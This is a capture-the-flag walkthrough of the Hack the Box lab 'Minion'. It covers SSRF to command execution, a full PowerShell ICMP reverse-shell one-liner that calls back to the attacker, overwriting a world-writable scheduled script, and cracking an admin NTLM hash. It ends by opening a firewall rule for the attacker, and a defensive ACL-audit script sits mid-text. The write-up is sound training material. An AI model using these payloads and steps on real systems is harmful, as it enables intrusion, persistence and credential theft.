htb-minion-nl

Today we are going to solve another CTF challenge, “Minion”, which is available online for those who want to improve their skills in penetration testing and black-box testing. Minion is a retired vulnerable lab presented by Hack the Box for practising penetration testing online according to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are available online they have static IPs; the IP of Minion is 10.10.10.57, so let’s begin with nmap port enumeration.

root@kali:~/htb/minion# nmap -sV -p- 10.10.10.57
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-31 15:44 CET
Nmap scan report for 10.10.10.57
Host is up (0.027s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
62696/tcp open http Microsoft IIS httpd 8.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 842.77 seconds

We don’t find anything on the webpage, so we run dirb to enumerate directories. As the target machine is running Microsoft IIS, we look for .asp files.

root@kali:~/htb/minion# dirb http://10.10.10.57:62696 -X .asp

-----------------
DIRB v2.22 
By The Dark Raver
-----------------

START_TIME: Thu Jan 31 16:10:15 2019
URL_BASE: http://10.10.10.57:62696/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.asp) | (.asp) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.57:62696/ ----
+ http://10.10.10.57:62696/test.asp (CODE:200|SIZE:41) 

-----------------
END_TIME: Thu Jan 31 16:12:29 2019
DOWNLOADED: 4612 - FOUND: 1

After enumerating this system, we find that this page is vulnerable to SSRF. When we use it to access localhost we find a link called system commands.

As we are not accessing the page directly, we take a look at the source code and find the link to the system command page.

We open it via the SSRF and find a form that can be used to execute our commands.

When we try to execute a command we are unable to. So we take a look at the source code of the page and find the parameter that is used to pass the command we type.

After finding the parameter we use it to pass our command, and we find that we only get a response in terms of Exit Status: Exit Status = 1 for success and Exit Status = 0 in case of errors.

Now when we try to get a reverse shell we are unable to; it is possible that TCP and UDP packets are blocked. So we ping ourselves using this RCE vulnerability to check whether ICMP packets are allowed.

Hmmmm… The method is POST and the parameter is named “xcmd”. Nevertheless, let’s make an experiment: we use the GET method and pass the xcmd parameter via the URL, setting xcmd = ping 10.10.14.15:

On our side, let’s see if we capture any pings coming from MINION (10.10.10.57):

Getting shell

It’s time for us to get a shell. On our side we can run icmpsh_m.py from https://github.com/inquisb/icmpsh and on MINION we can send this payload: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1
The problem is that if we try to send this payload via the xcmd parameter some symbols get filtered (“+”, “&”, “/”) and there is also a size limit. We can double URL-encode the special symbols to pass them through. We can also use multiple “echo >>” commands to write a .ps1 script file, and indeed many guys followed that path. But Alamot wrote his -very compact- one-liner payload without using any “+” or “&” symbols:

$ip = 'LHOST'; $id = 'UNIQUEID'; $ic = New-Object System.Net.NetworkInformation.Ping; $po = New-Object System.Net.NetworkInformation.PingOptions; $po.DontFragment=$true; function s($b) { $ic.Send($ip,5000,([text.encoding]::ASCII).GetBytes($b),$po) }; function p { -join($id,'[P$] ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ') }; while ($true) { $r = s(p); if (!$r.Buffer) { continue; }; $rs = ([text.encoding]::ASCII).GetString($r.Buffer);  if ($rs.Substring(0,8) -ne $id) { exit }; try { $rt = (iex -Command $rs.Substring(8) | Out-String); } catch { $rt = ($_.Exception|out-string) }; $i=0; while ($i -lt $rt.length-110) { s(-join($id,$rt.Substring($i,110))); $i -= -110; }; s(-join($id,$rt.Substring($i))); }

You can see he did some tricks like using $i -= -110 instead of $i += 110, etc. The script has a unique-id feature, because, when using the ICMP protocol, things can get quite messy if multiple payloads are running simultaneously. You can download his script from here: https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Minion/icmp_alamot.py

Now, let’s get a shell (don’t forget to change LHOST inside the script):

root@kali:~/htb# python icmp_alamot.py 
Sending powershell ICMP payload [UID=84444eaf] and waiting for shell...
[P$] iis apppool\defaultapppool@MINION inetsrv> dir c:\


Directory: C:\


Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
d---- 9/4/2017 7:42 PM accesslogs 
d---- 8/10/2017 10:43 AM inetpub 
d---- 8/22/2013 8:52 AM PerfLogs 
d-r-- 9/25/2017 1:51 AM Program Files 
d---- 8/10/2017 9:42 AM Program Files (x86) 
d---- 8/24/2017 1:28 AM sysadmscripts 
d---- 9/16/2017 2:41 AM temp 
d-r-- 9/4/2017 7:41 PM Users 
d---- 9/10/2017 10:20 AM Windows


[P$] iis apppool\defaultapppool@MINION inetsrv>

The folder sysadmscripts seems interesting:

We go into that directory and find two files called “c.ps1” and “del_logs.bat”.

We take a look at the content of the files and find that c.ps1 writes something into a file that is passed as its argument. “del_logs.bat” creates logs in log.txt in the c:\windows\temp\ directory, and we find that its timestamp changes every 5 minutes.

Let’s examine the permissions in the sysadmscripts folder:

[P$] apppool\defaultapppool@MINION sysadmscripts> ls | get-acl | fl

Path   : Microsoft.PowerShell.Core\FileSystem::C:\sysadmscripts\c.ps1
Owner  : BUILTIN\Administrators
Group  : MINION\None
Access : Everyone Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  FullControl
Audit  : 
Sddl   : O:BAG:S-1-5-21-2506507270-770315343-2455145413-513D:PAI(A;;FA;;;WD)(A;
         ;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;BU)

Path   : Microsoft.PowerShell.Core\FileSystem::C:\sysadmscripts\del_logs.bat
Owner  : BUILTIN\Administrators
Group  : MINION\None
Access : Everyone Allow  ReadAndExecute, Synchronize
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
Audit  : 
Sddl   : O:BAG:S-1-5-21-2506507270-770315343-2455145413-513D:PAI(A;;0x1200a9;;;
         WD)(A;;FA;;;SY)(A;;FA;;;BA)(A;;0x1200a9;;;BU)

The user decoder runs the script c.ps1 every 5 minutes, and we can overwrite it with our own payload.
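The Get-Acl output above is the whole story of the privilege escalation: c.ps1 carries an Allow ACE with FullControl for Everyone and for BUILTIN\Users, while del_logs.bat only grants 0x1200a9 (read and execute) to those groups. A scheduled script that one account runs and any account can rewrite is a classic misconfiguration, and it is easy to audit mechanically from the SDDL string. The script below is an added example, not code from the write-up: it parses the two SDDL strings printed above (re-joined onto one line), decodes each ACE's rights field, and reports every Allow entry that gives a broad group a write, delete or ownership right.

```python
"""Flag file ACEs that let low-privileged principals overwrite a script.

Added example, not code from the write-up. It parses the SDDL strings that
Get-Acl printed for c.ps1 and del_logs.bat and reports every Allow ACE that
grants a write, delete or ownership right to Everyone (WD), BUILTIN\\Users
(BU) or Authenticated Users (AU). A script that another account runs on a
schedule should never have such an entry; c.ps1 does, del_logs.bat does not.
"""
import re

# SDDL rights abbreviations -> access-mask bits (the subset relevant to files)
RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
}

# Any of these bits lets the holder change the file's content, ACL or owner
WRITE_MASK = (0x0002 | 0x0004 | 0x0010 | 0x0100   # WRITE_DATA, APPEND, WRITE_EA, WRITE_ATTRS
              | 0x10000 | 0x40000 | 0x80000       # DELETE, WRITE_DAC, WRITE_OWNER
              | 0x40000000 | 0x10000000)          # GENERIC_WRITE, GENERIC_ALL

BROAD_TRUSTEES = {"WD": "Everyone", "BU": "BUILTIN\\Users", "AU": "Authenticated Users"}

# Copied from the Get-Acl output above, with the line breaks removed
C_PS1_SDDL = ("O:BAG:S-1-5-21-2506507270-770315343-2455145413-513"
              "D:PAI(A;;FA;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;BU)")
DEL_LOGS_SDDL = ("O:BAG:S-1-5-21-2506507270-770315343-2455145413-513"
                 "D:PAI(A;;0x1200a9;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)(A;;0x1200a9;;;BU)")


def rights_mask(token):
    """Convert an SDDL rights field (hex literal or 2-letter codes) to a mask."""
    if token.lower().startswith("0x"):
        return int(token, 16)
    mask = 0
    for i in range(0, len(token), 2):
        mask |= RIGHTS[token[i:i + 2]]   # KeyError for codes this subset omits
    return mask


def parse_dacl(sddl):
    """Return the DACL's ACEs as dicts: type, flags, mask, sid."""
    match = re.search(r"D:([A-Z]*)((?:\([^)]*\))+)", sddl)
    if not match:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", match.group(2)):
        ace_type, flags, rights, _obj, _iobj, sid = body.split(";")[:6]
        aces.append({"type": ace_type, "flags": flags,
                     "mask": rights_mask(rights), "sid": sid})
    return aces


def weak_write_aces(sddl):
    """(trustee, mask) for every Allow ACE giving a broad group write rights."""
    return [(BROAD_TRUSTEES[a["sid"]], a["mask"])
            for a in parse_dacl(sddl)
            if a["type"] == "A" and a["sid"] in BROAD_TRUSTEES and a["mask"] & WRITE_MASK]


if __name__ == "__main__":
    for name, sddl in (("c.ps1", C_PS1_SDDL), ("del_logs.bat", DEL_LOGS_SDDL)):
        hits = weak_write_aces(sddl)
        status = "WEAK" if hits else "ok"
        print("%-13s %-4s %s" % (name, status, ", ".join("%s=0x%X" % h for h in hits)))
```

In practice you would feed this the Sddl property of every script referenced by a scheduled task or service, so that c.ps1 is reported before someone else finds it; the fix on the host is to strip the Everyone and Users entries so that only SYSTEM and Administrators can modify files under C:\sysadmscripts.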

Now we change the original c.ps1 with our file, so that we can try and get the user.txt and root.txt.

[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "dir c:\users\administrator\Desktop > c:\temp\output.txt" > c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "dir c:\users\decoder.MINION\Desktop >> c:\temp\output.txt" >> c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "copy c:\users\administrator\Desktop\root.txt c:\temp\root.txt" >> c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "copy c:\users\decoder.MINION\Desktop\* c:\temp\" >> c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> (Get-Content c:\temp\test.ps1) | ForEach-Object { $_ -replace """", "" } | Set-Content c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> copy c:\sysadmscripts\c.ps1 c:\temp\c.ps1.bak
[P$] iis apppool\defaultapppool@MINION sysadmscripts> copy c:\temp\test.ps1 c:\sysadmscripts\c.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> cd c:\temp
[P$] iis apppool\defaultapppool@MINION temp> dir


Directory: C:\temp


Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a--- 9/4/2017 7:19 PM 103297 backup.zip 
-a--- 9/26/2017 6:24 AM 284 c.ps1.bak 
-a--- 1/31/2019 6:01 AM 770 output.txt 
-a--- 1/31/2019 5:59 AM 228 test.ps1 
-a--- 8/25/2017 11:09 AM 33 user.txt


[P$] iis apppool\defaultapppool@MINION temp> type user.txt
40b******601
[P$] iis apppool\defaultapppool@MINION temp> get-content c:\temp\backup.zip -str pass
28a5d1e0c15af9f8fce7db65d75bbf17
-> We crack the NTLM hash using hashkiller.co.uk and find the password to be 1234test

[P$] iis apppool\defaultapppool@MINION temp> net use * \\minion\c$ /user:minion\administrator 1234test
Drive Z: is now connected to \\minion\c$.

The command completed successfully.

[P$] iis apppool\defaultapppool@MINION temp> z:
[P$] iis apppool\defaultapppool@MINION Z:\> dir


Directory: Z:\


Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
d---- 9/4/2017 7:42 PM accesslogs 
d---- 8/10/2017 10:43 AM inetpub 
d---- 8/22/2013 8:52 AM PerfLogs 
d-r-- 9/25/2017 1:51 AM Program Files 
d---- 8/10/2017 9:42 AM Program Files (x86) 
d---- 8/24/2017 1:28 AM sysadmscripts 
d---- 1/31/2019 6:01 AM temp 
d-r-- 9/4/2017 7:41 PM Users 
d---- 9/10/2017 10:20 AM Windows


[P$] iis apppool\defaultapppool@MINION Z:\> cd users
[P$] iis apppool\defaultapppool@MINION users> cd administrator
[P$] iis apppool\defaultapppool@MINION administrator> cd desktop
[P$] iis apppool\defaultapppool@MINION desktop> 


Directory: Z:\users\administrator\desktop


Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a--- 9/26/2017 6:18 AM 386479 root.exe 
-a--- 8/24/2017 12:32 AM 76 root.txt


[P$] iis apppool\defaultapppool@MINION desktop> type root.txt
In order to get the flag you have to launch root.exe located in this folder!

We wait a few minutes for the PowerShell script to be executed and find that we were able to extract “user.txt”. Before looking in the backup zip file, we take a look at the content of “output.txt” and find that the file was in the “c:\users\decoder.MINION\Desktop” directory.

c:\PENTEST\HASHCAT>hashcat32 -h | findstr NTLM
   5500 | NetNTLMv1                                        | Network Protocols
   5500 | NetNTLMv1+ESS                                    | Network Protocols
   5600 | NetNTLMv2                                        | Network Protocols
   1000 | NTLM                                             | Operating Systems
c:\PENTEST\HASHCAT>hashcat32 -a0 -m 1000 28a5d1e0c15af9f8fce7db65d75bbf17 e:\oscp\rockyou.txt --force --show
28a5d1e0c15af9f8fce7db65d75bbf17:1234test

We try to run root.exe but are unable to get a flag because we are not Administrator yet.

[P$] iis apppool\defaultapppool@MINION desktop> $user = '.\administrator';$psw = '1234test';$secpsw= ConvertTo-SecureString $psw -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $user, $secpsw
[P$] iis apppool\defaultapppool@MINION desktop> invoke-command -computername localhost -credential $credential -scriptblock {cd C:\Users\Administrator\Desktop\;C:\Users\Administrator\Desktop\root.exe}
25a*****cf1

Adding a firewall rule (as Administrator)

[P$] iis apppool\defaultapppool@MINION desktop> $user = '.\administrator';$psw = '1234test';$secpsw= ConvertTo-SecureString $psw -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $user, $secpsw
[P$] iis apppool\defaultapppool@MINION desktop> invoke-command -computername localhost -credential $credential -scriptblock {New-NetFirewallRule -DisplayName puckie -RemoteAddress 10.10.14.15 -Direction inbound -Action Allow}

Author: Puckiestyle
